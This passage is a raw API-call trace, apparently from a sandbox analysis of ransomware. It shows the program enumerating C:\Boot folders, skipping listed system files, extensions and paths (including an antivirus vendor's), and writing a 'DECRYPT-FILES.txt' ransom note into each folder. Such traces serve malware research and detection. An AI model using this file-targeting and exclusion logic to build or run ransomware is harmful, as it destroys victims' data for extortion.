ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.242] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.242] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.243] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.243] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.243] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.243] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.243] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.243] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.243] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.243] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.243] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.243] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\Fonts\\jkbimi8.tmp") returned="C:\\Boot\\Fonts\\jkbimi8.tmp" [0071.243] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.243] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jkbimi8.tmp" (normalized: "c:\\boot\\fonts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.243] CloseHandle (hObject=0x0) returned 0 [0071.243] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.244] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="autorun.inf") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="boot.ini") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="desktop.ini") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ntuser.dat") returned -1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="iconcache.db") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="bootsect.bak") returned 1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="thumbs.db") returned -1 [0071.244] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Bootfont.bin") returned 1 [0071.244] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0071.244] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0071.244] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0071.244] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0071.244] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0071.244] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.244] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0071.244] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.244] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="jpn_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\Boot\\Fonts\\jpn_boot.ttf" [0071.244] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.244] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.244] CloseHandle (hObject=0x0) returned 0 [0071.245] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.245] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="autorun.inf") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="boot.ini") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="desktop.ini") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ntuser.dat") returned -1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="iconcache.db") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="bootsect.bak") returned 1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ntuser.dat.log") returned -1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="thumbs.db") returned -1 [0071.245] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Bootfont.bin") returned 1 [0071.245] lstrlenW (lpString="kor_boot.ttf") returned 12 [0071.245] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0071.245] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0071.245] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0071.245] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0071.245] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.245] lstrlenW (lpString="kor_boot.ttf") returned 12 [0071.245] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.245] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="kor_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\Boot\\Fonts\\kor_boot.ttf" [0071.245] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.246] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.246] CloseHandle (hObject=0x0) returned 0 [0071.246] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.246] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="DECRYPT-FILES.txt") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="autorun.inf") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="boot.ini") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="desktop.ini") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ntuser.dat") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="iconcache.db") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="bootsect.bak") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ntuser.dat.log") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="thumbs.db") returned 1 [0071.246] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Bootfont.bin") returned 1 [0071.246] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0071.246] lstrcmpiW (lpString1="ttf", lpString2="lnk") returned 1 [0071.246] lstrcmpiW (lpString1="ttf", lpString2="exe") returned 1 [0071.246] lstrcmpiW (lpString1="ttf", lpString2="sys") returned 1 [0071.246] lstrcmpiW (lpString1="ttf", lpString2="dll") returned 1 [0071.246] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0071.246] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0071.246] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0071.246] lstrcatW (in: lpString1="C:\\Boot\\Fonts\\", lpString2="wgl4_boot.ttf" | out: lpString1="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\Boot\\Fonts\\wgl4_boot.ttf" [0071.246] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.247] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.247] CloseHandle (hObject=0x0) returned 0 [0071.247] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.247] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0071.247] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.247] CloseHandle (hObject=0x420) returned 1 [0071.247] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0071.247] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0071.247] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0071.247] lstrcatW (in: lpString1="fr-FR", lpString2="\\" | out: lpString1="fr-FR\\") returned="fr-FR\\" [0071.247] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fr-FR\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0071.247] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Program Files") returned 0x0 [0071.247] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch=":\\Windows") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Games\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\All Users") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="AhnLab") returned 0x0 [0071.248] StrStrW (lpFirst="C:\\Boot\\fr-FR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.248] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0071.248] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.248] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\fr-FR\\\\jkbimi8.tmp") returned 26 [0071.248] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\\\jkbimi8.tmp" (normalized: "c:\\boot\\fr-fr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.249] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0071.249] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.249] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\fr-FR\\\\DECRYPT-FILES.txt") returned 32 [0071.249] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fr-fr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.249] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.250] CloseHandle (hObject=0x424) returned 1 [0071.250] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0071.250] lstrcatW (in: lpString1="C:\\Boot\\fr-FR\\", lpString2="*" | out: lpString1="C:\\Boot\\fr-FR\\*") returned="C:\\Boot\\fr-FR\\*" [0071.250] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.251] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.251] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.251] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.251] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.251] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.251] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.251] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.251] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.251] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.251] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0071.251] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.251] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\fr-FR\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0071.251] lstrcatW (in: lpString1="C:\\Boot\\fr-FR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0071.251] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.252] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.252] CloseHandle (hObject=0x0) returned 0 [0071.252] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.252] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.252] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.252] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.252] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.252] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.252] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.252] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.252] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.252] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.253] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0071.253] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.253] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\fr-FR\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0071.253] lstrcatW (in: lpString1="C:\\Boot\\fr-FR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\fr-FR\\jkbimi8.tmp") returned="C:\\Boot\\fr-FR\\jkbimi8.tmp" [0071.253] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.253] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\jkbimi8.tmp" (normalized: "c:\\boot\\fr-fr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.253] CloseHandle (hObject=0x0) returned 0 [0071.253] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.253] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b11620, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b11620, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b11620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.253] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.253] CloseHandle (hObject=0x420) returned 1 [0071.253] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0071.255] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0071.255] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0071.255] lstrcatW (in: lpString1="hu-HU", lpString2="\\" | out: lpString1="hu-HU\\") returned="hu-HU\\" [0071.255] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="hu-HU\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Program Files") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch=":\\Windows") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Games\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\All Users") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", lpSrch="AhnLab") returned 0x0 [0071.255] StrStrW (lpFirst="C:\\Boot\\hu-HU\\", 